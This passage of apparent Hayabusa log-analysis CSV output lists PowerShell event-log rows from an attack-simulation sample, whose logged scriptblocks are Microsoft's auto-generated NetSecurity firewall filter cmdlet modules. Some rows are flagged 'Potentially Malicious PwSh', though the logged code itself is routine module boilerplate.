[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.436 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires 
-version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown 
= $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
